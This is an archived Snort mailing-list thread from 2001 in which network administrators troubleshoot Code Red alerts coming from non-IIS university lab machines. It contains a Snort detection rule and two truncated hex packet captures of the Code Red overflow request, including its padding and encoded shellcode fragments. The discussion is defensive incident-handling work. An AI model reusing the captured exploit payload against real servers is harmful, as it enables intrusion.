Snort mailing list archives
RE: CodeRed from non-IIS machines???
From: Kris Quinby <kquinby () pdx medscapeinc com>
Date: Tue, 7 Aug 2001 17:50:10 -0700
A rather alarmist view might think that the machine you are seeing these packets from might be a zombie that someone placed a copy of he original code on, then started the infection. You might want to track that machine down and investigate more. I would start by disconnecting from the network and placing on an isolated hub with a sniffer to see all of what it is trying to do. Kris -----Original Message----- From: Tom Kyle [mailto:tom () eos umsl edu] Sent: Tuesday, August 07, 2001 4:55 PM To: Kevin Brown; snort-users () lists sourceforge net Subject: Re: [Snort-users] CodeRed from non-IIS machines??? The rule is one that I pulled from the snort-users mailing list, and it's a pretty simple one: alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Code Red default.ida attempt"; flags:PA; uricontent:"GET /default.ida?"; nocase;) What's interesting is that I'm dumping the packet contents to disk and am seeing the exploit code there, which shouldn't have anything to do with the rule. Here's one to aolmail.aol.com [**] Code Red default.ida attempt [**] 08/06-18:33:02.335541 0:0:0:0:0:0 -> 0:0:0:0:0:0 type:0x0 len:0x600 134.124.xx.xx:2514 -> 205.188.222.249:80 TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmL en:1522 ***AP*** Seq: 0x7D7B4E4C Ack: 0x2FADB72B Win: 0x25BC TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com. 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356 ...etc etc etc... 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D [SS.......cx...M 08 8B 51 10 30 36 64 64 31 34 65 65 38 64 32 31 ..Q.06dd14ee8d21 61 30 38 62 36 61 31 61 34 66 38 63 35 32 36 64 a08b6a1a4f8c526d 36 30 3B 20 4F 66 66 65 72 3D 6E 6D 5F 61 3B 20 60; Offer=nm_a; 4F 66 66 65 72 45 78 70 3D 54 68 75 25 32 43 25 OfferExp=Thu%2C% 32 30 30 39 25 32 30 41 75 67 25 32 30 32 30 30 2009%20Aug%20200 31 25 32 30 32 33 25 33 41 32 38 25 33 41 33 35 1%2023%3A28%3A35 25 32 30 47 4D 54 0D 0A 0D 0A %20GMT.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ and another one to cgi.ebay.com: [**] Code Red default.ida attempt [**] 08/06-19:44:15.765892 0:0:0:0:0:0 -> 0:0:0:0:0:0 type:0x0 len:0x60C 134.124.abc.def:2151 -> 216.32.120.183:80 TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmL en:1534 ***AP*** Seq: 0x5202BCC4 Ack: 0x4FE39DD7 Win: 0x2058 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 N%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F ype: text/xml.HO 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A ST:www.worm.com. 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E Accept: */*.Con 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 tent-length: 356 ...etc.etc... 41 41 42 67 41 41 41 42 73 41 41 41 42 76 4E 32 AABgAAABsAAABvN2 38 37 7A 30 42 76 4F 7A 41 7A 41 4D 33 4E 7A 63 87z0BvOzAzAM3Nzc 33 4E 7A 63 33 4E 7A 63 33 4E 7A 63 33 4E 7A 63 3Nzc3Nzc3Nzc3Nzc 30 2A 6D 3B 20 65 62 61 79 73 69 67 6E 69 6E 3D 0*m; ebaysignin= 69 6E 0D 0A 0D 0A in.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ The packet endings are different, and the one to ebay even has a reference to ebay...hrm... So either there's a new CodeRed workalike that's not IIS-based (not good), or Snort is giving me the wrong packet payloads (very bad!), correct? Oh, I invoked snort with "snort -Afull -ade -c snort.conf -l /snort" Tom
Kevin Brown wrote: What does the rule look like that is catching this behavior. It is likely the rule needs to be tuned or altered to reduce the potential number of false positives.I've been learning Snort on the fly attempting to track down CodeRed-infected machines here at my university. Unfortunately, we have many partially-administered IIS servers on the network.Fortunately,that number is dropping as a result of CodeRed and CodeRed II. I started seeing some very odd things since getting 1.8.1-beta6 upandrunning on Solaris8 / Ultra5 last night. What I'm seeing is severalmachines that are NOT Win2k boxes OR running IIS being the sourcesofCodeRed I-style overflows. All IP's seem to be NT4.0 or 98 boxes, some of them locked-down lab workstation. The destination addresses are rather odd, as well, being rather popular surfing destinations, such as cgi.ebay.com, aolmail.aol.com, www.law8.hotmail.com, and our ISP's akamaitech cache, not random, off-the-wall hits and misses like I expected. I was able to get a peek at one of the machines this morning, anddidnot find anything unusual, although Explorer seemed rather willingtosegfault rather frequently. Coming from a UNIX background, I wasn'texactly sure where to look for anything nasty, and I was also perplexed as this was a lab machine that are pretty neatly locked down(AFAIK).Has anyone else found anything similar?
-- Thomas A. Kyle Network Security Administrator University of Missouri-St. Louis tkyle () jinx umsl edu (314) 516-6012 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- RE: CodeRed from non-IIS machines??? Kevin Brown (Aug 07)
- Re: CodeRed from non-IIS machines??? Tom Kyle (Aug 07)
- <Possible follow-ups>
- CodeRed from non-IIS machines??? Tom Kyle (Aug 07)
- RE: CodeRed from non-IIS machines??? Kris Quinby (Aug 07)